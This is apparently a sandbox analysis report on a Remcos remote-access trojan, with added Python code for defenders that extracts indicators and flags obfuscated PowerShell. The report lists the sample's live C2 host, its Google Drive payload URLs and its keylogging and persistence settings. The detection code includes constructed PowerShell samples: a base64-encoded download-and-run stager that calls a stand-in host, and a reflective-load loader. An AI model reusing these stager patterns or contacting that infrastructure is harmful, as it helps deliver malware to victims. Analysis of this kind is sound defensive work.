Source: 00000008.00000002.2452849140.00000000046BD000.00000004.00000020.00020000.00000000.sdmp
Malware Configuration Extractor: Remcos {"Host:Port:Password": "a458386d9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "Rmc-WDQFG0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: powershell.exe, 00000001.00000002.2070849929.000001E5698D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E569749000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.google.com |
Source: powershell.exe, 00000001.00000002.2070849929.000001E569785000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.usercontent.google.com |
Source: powershell.exe, 00000001.00000002.2107886450.000001E577A32000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000001.00000002.2070849929.000001E567BE8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000001.00000002.2070849929.000001E5679C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2456593952.0000000004921000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000001.00000002.2070849929.000001E567BE8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000001.00000002.2070849929.000001E5679C1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000006.00000002.2456593952.0000000004921000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lBfq |
Source: powershell.exe, 00000001.00000002.2070849929.000001E569749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2400143967.00000000046EE000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 00000001.00000002.2107886450.000001E577A32000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000001.00000002.2107886450.000001E577A32000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000001.00000002.2107886450.000001E577A32000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000001.00000002.2070849929.000001E569698000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.googP |
Source: powershell.exe, 00000001.00000002.2070849929.000001E5698D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E569698000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567BE8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: msiexec.exe, 00000008.00000002.2452849140.000000000467A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/ |
Source: msiexec.exe, 00000008.00000002.2452849140.000000000467A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/6 |
Source: powershell.exe, 00000001.00000002.2070849929.000001E567BE8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=12lzUxLYysnAHg12uOMXb7uEyOaJCANHHP |
Source: powershell.exe, 00000006.00000002.2456593952.0000000004A79000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=12lzUxLYysnAHg12uOMXb7uEyOaJCANHHXR |
Source: msiexec.exe, 00000008.00000002.2452849140.000000000467A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2452849140.00000000046BD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2453434788.0000000004A50000.00000004.00001000.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=18-jwgMnSvCSYj0VHz_F9CQMQhWD-8FQ8 |
Source: msiexec.exe, 00000008.00000002.2452849140.000000000467A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=18-jwgMnSvCSYj0VHz_F9CQMQhWD-8FQ8n |
Source: powershell.exe, 00000001.00000002.2070849929.000001E56976E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.googh |
Source: powershell.exe, 00000001.00000002.2070849929.000001E56976E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E569BA9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: msiexec.exe, 00000008.00000002.2452849140.00000000046D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2435697705.00000000046E3000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/ |
Source: powershell.exe, 00000001.00000002.2070849929.000001E567E58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E569BA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567F59000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=12lzUxLYysnAHg12uOMXb7uEyOaJCANHH&export=download |
Source: msiexec.exe, 00000008.00000003.2400143967.00000000046EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2452849140.00000000046D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2435697705.00000000046E3000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=18-jwgMnSvCSYj0VHz_F9CQMQhWD-8FQ8&export=download |
Source: powershell.exe, 00000001.00000002.2070849929.000001E567E58000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com:PSGP |
Source: powershell.exe, 00000001.00000002.2070849929.000001E567BE8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000001.00000002.2070849929.000001E568862000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000001.00000002.2107886450.000001E577A32000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000001.00000002.2070849929.000001E569749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2400143967.00000000046EE000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000001.00000002.2070849929.000001E569749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2400143967.00000000046EE000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000001.00000002.2070849929.000001E569749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2400143967.00000000046EE000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000001.00000002.2070849929.000001E569749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2400143967.00000000046EE000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000001.00000002.2070849929.000001E569749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2400143967.00000000046EE000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
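The extracted Remcos configuration at the top of this section and the Google Drive download URLs in the string list above are the artefacts worth acting on; the rest of the strings (Pester, NuGet, contoso.com, aka.ms) are PowerShell module residue. The block below is an added example, my own code rather than the sandbox's extractor, that turns both into normalised indicators. It copies the configuration JSON and the Drive URL strings from the report as printed. One assumption that the report does not state: multiple Remcos C2 entries are separated by `|` inside the `Host:Port:Password` field.

```python
import json
import re

# Remcos configuration exactly as the report's configuration extractor printed it.
REMCOS_CONFIG = json.loads(r'''{"Host:Port:Password": "a458386d9.duckdns.org:3256:1",
 "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable",
 "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path",
 "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "Rmc-WDQFG0",
 "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat",
 "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable",
 "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "",
 "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots",
 "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable",
 "Audio record time": "5"}''')

# Memory strings copied from the report's string list: both Google Drive URL forms,
# including the hits that carry trailing memory residue, plus two truncated fragments.
MEMORY_STRINGS = [
    "https://drive.google.com/uc?export=download&id=12lzUxLYysnAHg12uOMXb7uEyOaJCANHHP",
    "https://drive.google.com/uc?export=download&id=12lzUxLYysnAHg12uOMXb7uEyOaJCANHHXR",
    "https://drive.google.com/uc?export=download&id=18-jwgMnSvCSYj0VHz_F9CQMQhWD-8FQ8",
    "https://drive.google.com/uc?export=download&id=18-jwgMnSvCSYj0VHz_F9CQMQhWD-8FQ8n",
    "https://drive.usercontent.google.com/download?id=12lzUxLYysnAHg12uOMXb7uEyOaJCANHH&export=download",
    "https://drive.usercontent.google.com/download?id=18-jwgMnSvCSYj0VHz_F9CQMQhWD-8FQ8&export=download",
    "https://drive.googP",
    "https://drive.usercontent.googh",
]


def parse_c2(field: str) -> list:
    """Split Remcos' 'Host:Port:Password' field into one record per C2.
    Assumption (not stated in the report): multiple C2 entries are separated by '|'."""
    records = []
    for entry in field.split("|"):
        host, port, password = entry.rsplit(":", 2)
        records.append({"host": host, "port": int(port), "password": password})
    return records


def remcos_iocs(cfg: dict) -> dict:
    """Reduce the config to the artefacts a hunt or a detection rule can act on."""
    run_keys = [key[len("Setup "):] for key in ("Setup HKCU\\Run", "Setup HKLM\\Run")
                if cfg.get(key) == "Enable"]
    return {
        "c2": parse_c2(cfg["Host:Port:Password"]),
        "mutex": cfg["Mutex"],
        "dropped_copy": cfg["Copy file"],        # file name written to the install path
        "persistence_run_keys": run_keys,         # Run keys the sample is configured to set
        "keylog_file": cfg["Keylog file"] if cfg.get("Keylog flag") == "1" else None,
    }


DRIVE_DELIMITED = re.compile(
    r"drive\.usercontent\.google\.com/download\?id=([A-Za-z0-9_-]+)&export=download")
DRIVE_OPEN_ENDED = re.compile(
    r"drive\.google\.com/uc\?export=download&id=([A-Za-z0-9_-]+)")


def drive_file_ids(strings) -> list:
    """Collect Google Drive file IDs from memory strings.

    In the usercontent form the ID is closed by '&export=download'; in the
    'uc?export=download&id=' form the ID ends the string, so whatever followed it in
    memory (the stray 'P', 'XR' and 'n' above) gets glued on. An open-ended hit that
    merely extends a delimited ID is therefore dropped as residue.
    """
    delimited, open_ended = set(), set()
    for s in strings:
        delimited.update(DRIVE_DELIMITED.findall(s))
        open_ended.update(DRIVE_OPEN_ENDED.findall(s))
    ids = set(delimited)
    for cand in open_ended:
        if not any(cand != d and cand.startswith(d) for d in delimited):
            ids.add(cand)
    return sorted(ids)


if __name__ == "__main__":
    print(json.dumps(remcos_iocs(REMCOS_CONFIG), indent=2))
    print(drive_file_ids(MEMORY_STRINGS))
```

The C2 host is a duckdns.org dynamic-DNS name, so the IP it resolves to is volatile; pivot on the hostname with port 3256, the mutex `Rmc-WDQFG0` and the Run-key persistence rather than on an address. The two Drive file IDs identify the hosted stages and are stable until the attacker replaces the files.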
Source: amsi64_3020.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: amsi32_5728.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 3020, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 5728, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
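The report shows only the matched rule's description, "base64 encoded files, concatenation and execution", not its body. The block below is an added example of that idea as a Python triage check; the patterns are my own heuristics, not ditekSHen's rule, and the PowerShell snippets it runs over are constructed, not taken from the analysed sample. It assumes that "execution" means Invoke-Expression/IEX, Invoke-Command, Start-Process or reflective assembly loading, and it only flags a script when all three pattern families fire, which is the conjunction the description names.

```python
import re

# Heuristic approximation of the rule description (my patterns, not the author's rule).
PATTERNS = {
    # FromBase64String, or a bare run of 40+ base64 characters with optional padding
    "base64": re.compile(
        r"FromBase64String|(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{40,}={0,2}(?![A-Za-z0-9+/])",
        re.IGNORECASE),
    # 'literal' + 'literal', or the -join operator used to reassemble fragments
    "concat": re.compile(r"""['"][^'"]*['"]\s*\+\s*['"]|-join\b""", re.IGNORECASE),
    # assumed set of execution primitives
    "exec": re.compile(
        r"\b(?:Invoke-Expression|IEX|Invoke-Command|Start-Process)\b"
        r"|\[(?:System\.)?Reflection\.Assembly\]::Load",
        re.IGNORECASE),
}


def triage_script(text: str) -> dict:
    """Report which pattern families fire and flag the script only when all three do."""
    hits = {name: bool(rx.search(text)) for name, rx in PATTERNS.items()}
    hits["suspicious"] = all(hits[name] for name in PATTERNS)
    return hits


# Constructed samples. 'TVqQ' is the base64 prefix of an MZ header, the usual tell for
# an embedded PE; the remaining blobs are opaque filler whose shape is all that matters.
LOADER = r"""
$p = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAA' + 'AAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFt'
$b = [System.Convert]::FromBase64String($p)
[System.Reflection.Assembly]::Load($b) | Out-Null
"""

STAGER = r"""
$parts = 'aW52b2tlLXdlYnJlcXVlc3QgaHR0cHM6Ly9leGFtcGxlLnRlc3Qv', 'cC5iaW4gLW91dGZpbGUgcC5leGU='
$cmd = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(($parts -join '')))
Invoke-Expression $cmd
"""

# base64 decode without concatenation or execution: one family only, so not flagged
PARTIAL = r"""
$raw = [Convert]::FromBase64String((Get-Content 'C:\tmp\blob.txt'))
[IO.File]::WriteAllBytes('C:\tmp\out.bin', $raw)
"""

BENIGN = r"""
$content = Get-Content -Path 'C:\logs\app.log'
Write-Output ('Lines: ' + $content.Count)
"""


if __name__ == "__main__":
    for name, text in (("LOADER", LOADER), ("STAGER", STAGER),
                       ("PARTIAL", PARTIAL), ("BENIGN", BENIGN)):
        print(name, triage_script(text))
```

The rule fired on the two amsi*.amsi.csv sources as well as on process memory. AMSI hands the scanner the script content at the point it is about to run, so fragments that are concatenated and base64-decoded at run time are visible there even when no single on-disk file contains the assembled payload; a check like this one gives its best results on those buffers rather than on the dropped script alone.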